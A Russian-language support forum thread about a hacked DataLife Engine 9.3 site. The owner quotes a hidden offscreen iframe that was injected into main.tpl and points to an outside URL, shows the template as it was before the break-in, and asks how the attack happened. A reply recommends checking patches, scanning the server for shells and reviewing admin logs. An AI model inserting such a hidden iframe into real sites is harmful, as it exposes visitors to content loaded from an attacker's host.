CMS DataLife Engine - Система управления сайтами

Sign in to follow this  
_spawn_

Взломали сайт, все патчи ставились.

Recommended Posts

Вчера обнаружил взлом сайта (чужой код обнаружен через сутки после взлома), все обновления и патчи вроде ставились.

Версия движка - 9.3.

В main.tpl появилась вот такая вставка:  

 

<noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript><iframe src="http://forum.academy.com.ua/styles/subsilver2/theme/images/" width=14 height=14 style="position:absolute; left:-9999px;"></iframe>


До взлома было вот так:

<noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript>

 

Уважаемые админы подскажите, как произошел данный взлом, какой патч нужно использовать, чтобы закрыть уязвимость.

Старался ставить все патчи, возможно какой-то не установлен или это новый вид уязвимости?
 

Share this post


Link to post
Share on other sites
5 часов назад, _spawn_ сказал:

все обновления и патчи вроде ставились.

"Вроде" и "ставились" это вещи принципиально разные. Смотрите весь список патчей https://dle-news.ru/bags/ и сверяйте у себя на сервере начиная от вашей версии, все ли действительно стоит. Поставить патч например постфактум недостаточно, нужно проверить сервер на наличие шеллов.

 

В админпанели DLE есть раздел "Список действий в админпанели", проверяйте там кто редактировал ваши шаблоны. Если там нет редактирования, то сделали вам это минуя DLE и стоит уже обезопаситься и принять меры уже выше, например могли украсть доступы к серверу, или уязвимости в серверном ПО. 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this